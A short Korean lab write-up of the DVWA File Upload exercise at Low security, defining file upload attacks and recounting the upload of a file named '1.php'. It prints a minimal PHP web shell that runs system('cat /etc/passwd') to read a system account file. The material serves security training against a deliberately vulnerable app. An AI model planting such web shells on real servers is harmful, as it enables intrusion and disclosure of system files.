Exercise 5. File Upload

파일 업로드 공격이란?

• 파일이 업로드 되는 페이지(게시판, SNS등)에 악성 파일(웹셀)을 업로드

    

(출처:인프런/화이트해커가-되기위한-8가지)

DVWA 실습

(Low)

나는 먼저 이런식으로 작성을 해주었다. 파일명은 "1.php" 

파일을 업로드 한후 그 업로드 한 파일의 경로에 맞춰 들어가 보았다.

phpinfo()나 system() 함수를 이용하여 공격을 시도해 보았다.

// 1.php

<?php

    system("cat /etc/passwd");

?>